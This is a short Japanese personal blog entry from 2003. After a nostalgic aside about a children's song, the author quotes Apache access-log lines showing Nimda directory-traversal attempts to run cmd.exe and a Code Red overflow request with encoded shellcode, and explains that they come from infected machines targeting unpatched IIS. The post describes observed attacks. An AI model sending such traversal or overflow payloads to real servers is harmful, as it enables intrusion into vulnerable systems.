Sweetdiary

SweetDiary

2003年05月31日(土)

あみだばばあ

なんか最近、あみだばばあが懐かしく思われる今日この頃です。
あ～っみだっくじ～あ～っみだっくじ～～ひぃってたのしいぃあ～っみだっくじ～...

あの切ないメロデーがなんともいえません。

ところで、今日、アパッチのアクセスログをすこしみてみたところ下記のようなログがいっぱいありました。
=== PATTERN 1
24.61.24.58 - - [03/Feb/2003:04:40:14 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
24.61.24.58 - - [03/Feb/2003:04:40:14 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
24.61.24.58 - - [03/Feb/2003:04:40:14 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
24.61.24.58 - - [03/Feb/2003:04:40:14 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.61.24.58 - - [03/Feb/2003:04:40:15 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.61.24.58 - - [03/Feb/2003:04:40:15 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.61.24.58 - - [03/Feb/2003:04:40:15 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.61.24.58 - - [03/Feb/2003:04:40:15 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
24.61.24.58 - - [03/Feb/2003:04:40:15 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
24.61.24.58 - - [03/Feb/2003:04:40:15 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
24.61.24.58 - - [03/Feb/2003:04:40:15 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

=== PATTERN 2
61.146.15.110 - - [09/Feb/2003:02:44:10 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 317

PATTERN 1はNIMDAに感染したPCからのアタックです。
PATTERN 2はCODE REDに感染したPCからのアタックです。

両方ともセキュリティパッチを更新していないIISのサービスを立ち上げてる人にしかきかないのですが、このログが僕のログにもあるわあるわ。。。これらのウイルスはあれだけさわがれたのに、まだまだほっとく人がいるんですなあ。。。

別にいいんですけど、ログがすぐにいっぱいになるので、なんかやです、ｗ。

　＜ Previous

　INDEX

　Next ＞

Sweetrobot [MAIL] [HOME]